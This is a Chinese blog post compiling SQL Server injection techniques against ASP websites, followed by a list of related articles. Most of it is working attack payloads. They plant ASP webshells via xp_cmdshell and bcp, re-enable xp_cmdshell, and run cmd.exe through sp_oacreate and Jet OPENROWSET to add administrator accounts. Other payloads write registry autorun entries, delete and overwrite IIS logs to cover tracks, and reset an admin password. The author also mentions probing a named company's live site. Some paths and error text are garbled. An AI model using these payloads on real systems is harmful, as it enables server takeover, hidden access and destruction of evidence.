sql server 注入

原創 flyer222 2020-02-20 18:37
1、 用^轉義字符來寫ASP(一句話木馬)文件的方法:
 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:mu.asp'--

 echo ^<%execute^(request^("l"^)^)%^> >c:mu.asp

2、 顯示SQL系統版本:
 http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
 http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--

Microsoft VBScript 編譯器錯誤 錯誤 魸a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft OLE DB Provider for ODBC Drivers 錯誤 ?e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.asp,行17
3、 在檢測索尼中國的網站漏洞時,分明已經確定了漏洞存在卻無法在這三種漏洞中找到對應的類型。偶然間我想到了在SQL語言中可以使用“in”關鍵字進行查詢,例如“select * from mytable where id in(1)”,括號中的值就是我們提交的數據,它的結果與使用“select * from mytable where id=1”的查詢結果完全相同。所以訪問頁面的時候在URL後面加上“) and 1=1 and 1 in(1”後原來的SQL語句就變成了“select * from mytable where id in(1) and 1=1 and 1 in(1)”,這樣就會出現期待已久的頁面了。暫且就叫這種類型的漏洞爲“包含數字型”吧,聰明的你一定想到了還有“包含字符型”呢。對了,它就是由於類似“select * from mytable where name in(‘firstsee’)”的查詢語句造成的。

4、 判斷xp_cmdshell擴展存儲過程是否存在:
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
恢復xp_cmdshell擴展存儲的命令:
http://www.test.com/news/show1.asp?NewsId=125272
;exec master.dbo.sp_addextendedproc 'xp_cmdshell',’e:inetputwebxplog70.dll’;--

5、 向啓動組中寫入命令行和執行程序:
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionRun','help1','REG_SZ','cmd.exe /c net user test ptlove /add'


6、 查看當前的數據庫名稱:
 http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n) n改成0,1,2,3……就可以跨庫了
 http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft VBScript 編譯器錯誤 錯誤 魸a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft OLE DB Provider for ODBC Drivers 錯誤 ?e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.asp,行17
7、 列出當前所有的數據庫名稱:
select * from master.dbo.sysdatabases 列出所有列的記錄
select name from master.dbo.sysdatabases 僅列出name列的記錄

8、 不需xp_cmdshell支持在有注入漏洞的SQL服務器上運行CMD命令:
Create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:>c:temp.txt',Ɔ','true'
--注意run的參數true指的是將等待程序運行的結果,對於類似ping的長時間命令必需使用此參數。

EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:temp.txt'
--因爲fso的opentextfile方法將返回一個textstream對象,所以此時@file是一個對象令牌

WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
Insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

Drop TABLE MYTMP

----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:InetpubAdminScriptsadsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll" "C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll" "C:winntsystem32inetsrvasp.dll">c:temp.txt',Ɔ','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
Insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

以下是一行裏面將WEB用戶加到管理員組中:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:InetpubAdminScriptsadsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll" "C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll" "C:winntsystem32inetsrvasp.dll">c:temp.txt',Ɔ','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out Insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

以下是一行中執行EXE程序:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:bjeea.net.cnscoreftsimagesiis.vbs lh1 c:>c:temp.txt',Ɔ','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out Insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

SQL下三種執行CMD命令的方法:

先刪除7.18號日誌:
(1)exec master.dbo.xp_cmdshell 'del C:winntsystem32logfilesW3SVC5ex050718.log >c:temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:winntsystem32logfilesW3SVC5ex050718.log >c:temp.txt',Ɔ','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out Insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

(3)首先開啓jet沙盤模式,通過擴展存儲過程xp_regwrite修改註冊表實現,管理員修改註冊表不能預防的原因。出於安全原因,默認沙盤模式未開啓,這就是爲什麼需要xp_regwrite的原因,而xp_regwrite至少需要DB_OWNER權限,爲了方便,這裏建議使用sysadmin權限測試:
 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',1
注:
0 禁止一切(默認)
1 使能訪問ACCESS,但是禁止其它
2 禁止訪問ACCESS,但是使能其他
3 使能一切

 這裏僅給出sysadmin權限下使用的命令:
select * from openrowset('microsoft.jet.oledb.4.0','database=c:winntsystem32iasias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')


建立鏈接數據庫'L0op8ack'參考命令:
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:windowssystem32iasias.mdb'

 如何使用鏈接數據庫:

使用這個方式可以執行,但是很不幸,DB_OWNER權限是不夠的,需要至少sysadmin權限或者securityadmin+setupadmin權限組合
sp_addlinkedserver需要sysadmin或setupadmin權限
sp_addlinkedsrvlogin需要sysadmin或securityadmin權限
最終發現,還是sa權限或者setupadmin+securityadmin權限帳戶才能使用,
一般沒有哪個管理員這麼設置普通帳戶權限的

實用性不強,僅作爲一個學習總結吧

大致過程如下,如果不是sysadmin,那麼IAS.mdb權限驗證會出錯,
我測試的時候授予hacker這個用戶setupadmin+securityadmin權限,使用ias.mdb失敗
需要找一個一般用戶可訪問的mdb纔可以:

 新建鏈接服務器”L0op8ack”:EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:winntsystem32iasias.mdb'--
 exec sp_addlinkedsrvlogin 'L0op8ack','false'--或
exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove'--
 Select * FROM OPENQUERY(L0op8ack, 'Select shell("cmd.exe /c net user")');--
 exec sp_droplinkedsrvlogin 'L0op8ack','false'--
 exec sp_dropserver 'L0op8ack'--

再考貝一個其它文件來代替7.18日文件:
(1)exec master.dbo.xp_cmdshell 'copy C:winntsystem32logfilesW3SVC5ex050716.log C:winntsystem32logfilesW3SVC5ex050718.log>c:temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:winntsystem32logfilesW3SVC5ex050716.log C:winntsystem32logfilesW3SVC5ex050718.log>c:temp.txt',Ɔ','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out Insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:temp.txt',Ɔ','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out Insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

9、 用Update來更新表中的數據:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www'--
www用戶密碼的16位MD5值爲:a0b923820dcc509a,即把密碼改成1;
32位MD5值爲: ,密碼爲

10、 利用表內容導成文件功能
SQL有BCP命令,它可以把表的內容導成文本文件並放到指定位置。利用這項功能,我們可以先建一張臨時表,然後在表中一行一行地輸入一個ASP木馬,然後用BCP命令導出形成ASP文件。
命令行格式如下:
bcp "select * from temp " queryout c:inetpubwwwrootruncommand.asp –c –S localhost –U sa –P upload('S'參數爲執行查詢的服務器,'U'參數爲用戶名,'P'參數爲密碼,最終上傳了一個runcommand.asp的木馬)。 

 
flyer222
發佈了31 篇原創文章 · 獲贊 1 · 訪問量 6萬+
私信 關注
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

[oeasy]python020在遊戲中體驗數值自由_勇闖地下城_終端文字遊戲

繼續運行 ?* 回憶上次內容 上次使用shell環境中的命令 命令 作用 c

原創 2024-06-05 12:31:14

記一次“有手就行”的從SQL注入到文件上傳Getshell的簡單過程

0x01 前臺SQL注入 漏洞原理 SQL 注入漏洞的原理是應用程序沒有對用戶輸入進行充分的驗證和過濾,導致攻擊者可以在輸入框中插入惡意的 SQL 代碼。當應用程序將用戶輸入的數據拼接到 SQL 查詢語句中時,攻擊者插入的惡意代碼也會被執

原創 2024-06-04 11:28:02

Kubernetes 生命週期事件處理函數 postStart 和 preStop

在 Kubernetes 中,您可以通過爲容器的生命週期事件設置處理函數來執行命令。Kubernetes 支持兩種生命週期事件處理函數:postStart 和 preStop。 postStart 處理函數:在容器創建後立即執行。這個處

原創 2024-05-31 14:05:26

雲效 Flow 配置備忘

腳本 項目根目錄下創建shell文件夾,創建 cabinet.sh 腳本: #!/bin/bash # 應用名 APP_NAME=cabinet-service-test PROG_NAME=$0 ACTION=$1 APP_START

原創 2024-05-30 11:43:23

[oeasy]python019_ 如何在github倉庫中進入目錄_找到程序代碼_找到代碼

  繼續運行 🥋   回憶上次內容 上上次 真寫了 萬行 代碼 這 萬行 代碼 都是寫在 明面 上的 這次 使用git命令 下載了 github上面的倉庫  

原創 2024-05-30 00:35:24

記錄一次cnvd事件型證書漏洞挖掘

事件起因是因爲要搞畢設了,在爲這個苦惱,突然負責畢設的老師說得到cnvd下發的證書結合你的漏洞挖掘的過程是可以當成畢設的,當時又學習了一段時間的web滲透方面的知識,於是踏上了廢寢忘食的cnvd證書漏洞挖掘的日子。 前言:聽羣友們說,一般可

原創 2024-05-28 11:16:19

記一次攻防演練中的若依(thymeleaf 模板注入)getshell

記一次攻防演練中幸運的從若依弱口令到後臺getshell的過程和分析。 0x01 漏洞發現 首先,我會先把目標的二級域名拿去使用搜索引擎來搜索收集到包含這個目標二級域名的三級域名或者四級域名的網站。 這樣子可以快速的定位到你所要測試的漏洞

原創 2024-05-27 23:16:06

智能的PHP開發工具PhpStorm v2024.1全新發布——支持PHPUnit 11.0

PhpStorm是一個輕量級且便捷的PHP IDE,其旨在提高用戶效率,可深刻理解用戶的編碼,提供智能代碼補全,快速導航以及即時錯誤檢查。可隨時幫助用戶對其編碼進行調整,運行單元測試或者提供可視化debug功能。 立即獲取PhpStorm

原創 2024-05-24 12:20:21

linux加載動態庫失敗

一般我們在Linux下執行某些外部程序的時候可能會提示找不到共享庫的錯誤, 比如: tmux: error while loading shared libraries: libevent-1.4.so.2: cannot open sha

mskk 2024-05-21 00:52:55

Shell/Python中的用戶名獲取

一、幾個基本概念 登錄用戶(login user):通過登錄方式進入系統的用戶,強調登錄身份。 當前用戶(current user):執行一個進程或者命令時所使用的用戶身份,強調執行身份。          舉

原創 2024-05-19 00:44:35

Linux中的tty和pts

一、幾個基本概念 tty(Teletypewriter) 來源於“電傳打印機”,Linux系統中則是終端設備的統稱,同時也代指操作系統中支持終端設備的tty子系統。   console(控制檯)

原創 2024-05-18 00:45:13

Netgear無線路由器漏洞復現(CVE-2019-20760)

漏洞概述 漏洞服務: uhttpd 漏洞類型: 遠程命令執行 影響範圍: 1.0.4.26之前的NETGEAR R9000設備會受到身份驗證繞過的影響 解決建議: 更新版本 漏洞復現 操作環境: ubuntu:22.04 qemu-ve

原創 2024-05-14 23:17:30

記一些CISP-PTE題目解析

0x01 命令執行 直接payload: 127.0.0.1 &whoami,發現可以成功執行whoami命令 然後ls ../ ,發現有個key.php文件 嘗試用cat命令查看發現不行被攔截了。(其實題目過濾了常用的查看文件的命

原創 2024-05-11 23:51:24

dolphinscheduler 之變量篇

場景:查詢數據表總數,然後根據總數判斷走哪個分支節點 1.將sql結果輸出到變量 2.分支判斷 3.輸出結果   小結 本文總結了DophineSheduler上下游任務之間參數傳遞的方法,並對其中的易錯點進行了梳理,同時給出了具體

原創 2024-05-11 00:57:01

Linux系統中的文件和目錄權限

一、文件屬性        下文中,“文件”一詞默認代指廣義的數據類型,跟“目錄”等詞對比使用時,則專指普通文件(File)這一特定數據類型。        Linux系統中,我們可以使用命令“ls -al”來查看當前目錄

原創 2024-05-11 01:45:47